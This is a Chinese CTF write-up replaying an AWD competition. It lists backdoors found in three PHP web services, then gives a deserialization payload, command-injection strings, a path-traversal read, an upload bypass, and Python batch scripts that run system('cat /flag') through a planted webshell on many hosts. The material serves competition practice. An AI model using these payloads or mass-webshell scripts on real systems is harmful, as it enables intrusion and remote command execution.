awd的批量脚本 pwn_北极星杯 awd复现
北极星杯 awd复现
服务器共有3个web和一个pwn
web1
1,down下web1的源码,使用D盾扫描:
2,漏洞1:发现三个冰蝎的木马,和一个一句话木马
冰蝎的后门需要使用冰蝎的客户端进行连接:如图:
一句话木马直接使用菜刀或蚁剑连接即可:
3,漏洞2:sqlhelper.php的反序列化漏洞:
构造payload:
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
$s = new A;
$a = serialize($s);
echo $a;
构造payload得:
O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};
最终payload:
GET: ?x=v01cano
POST: un=O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};
4,漏洞3:sql注入漏洞login/index.php
username没有任何过滤,直接带入查询语句进行查询,由此处产生了sql注入漏洞。
5,漏洞4: 文件上传漏洞info.php
此处仅仅判断了content-type,所以只需在bp中修改content-type即可成功绕过。
web2
1,down下源码D盾扫描,发现如下漏洞:
icon/pww.php 冰蝎后门
images/pass.php 冰蝎后门
login/index.php 中有一句话木马:
2,connect.php的命令执行漏洞
仅仅使用addslashes对$host参数进行了过滤,我们执行命令的时候不使用引号和反斜杠\即可
payload:
||cat /flag > /ver/www/html/1.txt
3,img.php任意文件读取漏洞
使用seay源代码审计系统进行自动审计,发现该漏洞:
img参数没有任何过滤,直接带入file_get_contents函数进行文件读取,从而造成了文件读取漏洞。
payload:
/img.php?img=../../../../../../../flag
4,sqlhelper.php的反序列化漏洞
构造payload:
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
$s = new A;
$a = serialize($s);
echo $a;
构造payload得:
O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};
最终payload:
POST: un=O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};
web3
1,down下源码D盾扫描,发现如下漏洞:
命令执行漏洞:export.php
payload:
|| cat /flag > /var/www/html/1.txt ||
总结:
在awd比赛过程中,脚本的力量是不可忽略的,批量操作可以快速占据高地。
1,开局getflag脚本:
开局利用预留后门getflag,此处目标主机均是端口不同,修改端口即可。
import requests
url = "http://182.254.171.241:88{0}"
shell = "/.a.php"
payload = {"c": "system('cat /flag');"}
# data = {"c": "system('cat /flag');"}
for i in range(1, 5, 1):
i = str(i).zfill(2)
url1 = url.format(i) + shell
# print(url1)
try:
res = requests.post(url1, data=payload)
# print(res.status_code)
if res.status_code == requests.codes.ok:
res.encoding = res.apparent_encoding
print(url1+"connect success ,flag is : "+res.text)
else:
print("shell 404")
except:
print(url1 + "connect shell fail")
其他表哥们的脚本:
import requests
u = open('ip.txt', 'r+')
for urls in u:
try:
if 'http://' not in urls:
urle = 'http://' + urls
urlss = urle.strip('\n') + '/.a.php'
data = {"c": "system('cat /flag');"}
req = requests.post(url=urlss, data=data, timeout=3)
if req.status_code == 200:
print(req.text)
except:
print()
ip.txt中内容如下;
ip.txt可以采用如下脚本按照需要生成即可:
ip = "182.254.171.241:88{0}"
for i in range(1, 5, 1):
i = str(i).zfill(2)
ip1 = ip.format(i)
with open("ip1.txt","a") as f:
f.write(ip1+"\n")
以get请求获取flag:
import requests
ip = open("ip.txt", "r")
payload = {"c": "system('cat /flag');"}
shell = '/.a.php'
for url in ip:
if 'http://' not in url:
url = 'http://' + url
webshell = url + shell
try:
res = requests.get(webshell, params=payload, timeout=1)
if res.status_code == 200:
print(res.text)
else:
print("shell error")
except:
print("未知错误")
reference:
awd的批量脚本 pwn_北极星杯 awd复现相关推荐
- awd的批量脚本 pwn_北极星杯AWD-Writeup
前言 祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后. 我是M09ic,负责本次北极星杯AWD的赛后分享.靠着抱大腿以及足 ...
- awd的批量脚本 pwn_[原创]第一届护网杯线下决赛awd之shell多解
前言 好久不打比赛,顺便来北京实习就参加了护网杯.排名虽然有所提高但还是被各种大表哥吊打.(和企业参赛简直痛苦)这里带来决赛中awd比赛pwn题shell的两种漏洞利用方式. 程序保护 保护全开 程序 ...
- awd的批量脚本 pwn_AWD攻防之web入门篇
前言 AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分.也就是说,攻击别人的靶机可以获取 Flag ...
- awd的批量脚本 pwn_CTF线下赛AWD套路小结
CTF线下赛AWD套路小结 本文已在先知社区发表,欢迎访问,链接h 最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一.AWD模式简介 AWD ...
- plsql command window 执行批量脚本
commandwindow 是执行批量脚本的,也可以单个执行一条语句,但它的输出结果不如sqlwindow,而sqlwindow执行的是一个语句,输出结果是规范的表格 比如,现在有100条插入语句,你 ...
- 通过批处理调用SQL*Plus执行批量脚本
文章目录 在批处理文件中调用SQL*Plus命令执行批量脚本的场景 Windows命令终端连接数据库 方式1:登录进入SQL命令行 方式2:先进入SQL命令行,再登录 方式3: 使用用户名/密码连接指 ...
- 【图像去噪】兴智杯论文复现赛——NAFNet
论文复现--Low-level算法 NAFNet (去噪) Simple Baselines for Image Restoration--一个简单的用于图像恢复的强基线模型 官方源码:https:/ ...
- 2018领航杯awd简单复现
首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: ...
- HBase shell执行批量脚本
场景描述: HBase namespace中有大量无用的小表,占用了过多的block,需要批量删除,了解了一下有两种方式: 1.使用通配符 用drop命令可以删除表.在删除一个表之前必须先将其禁用. ...
最新文章
- 2022-2028年中国电熔镁行业市场研究及发展趋势分析报告
- Linux基础知识之挂载详解(mount,umount及开机自动挂载)
- boost::hawick_circuits用法的测试程序
- java学习(102):arraylist的查询和删除
- WPF TreeView 绑定(demo 转)
- python中面向对象的缺点_面向对象中的多态在 Python 中是否没有什么意义?
- 嵌入式基础面八股文——孤儿进程、僵尸进程、守护进程的概念(3)
- 如何简单运行Java程序
- 标准的Java编码规范手册
- 如何在古董级IPAD上修改植物大战僵尸游戏金币
- ardl模型stata命令_计量经济学《手把手教你EViews软件操作教程与案例分析》
- 芯片数据分析步骤5 过滤探针
- 【实习日报】2019年4月下半月 前端开发实习工作日报汇总
- python对接支付宝支付_python对接支付宝PC端支付
- CentOS7安装IT资产管理系统Snipe-IT
- 大神的傅里叶变换,一定要看看
- 游戏建模3Dmax基础:游戏建模渲染小技巧
- 在线办公的前浪与后浪:输出工具到输出能力
- 腾讯云网站备案-网站访问类问题汇总及解答
- 网络基础 - 探秘无线速度(一)
热门文章
- 杂记-Macbook Pro M1芯片能玩深度学习吗?
- Hadoop的数据压缩
- asp.net+js+ajax实现手机移动端页面预览、剪裁、上传头像图片
- 微软声学回声消除demo AECMicArray的使用
- 剑指Offer——求1+2+3+...+n
- 「Jenkins Pipeline」- expected to call xxx but wound up catching xxx @20210219
- java对焦_Android camera摄像头对焦,zoom的通知事件回调,告诉java应用层已经对焦完成...
- C++string字符串初始化与使用
- Mac IntelliJ IDEA 2020.1 闪退
- 再论关于如何学习网络编程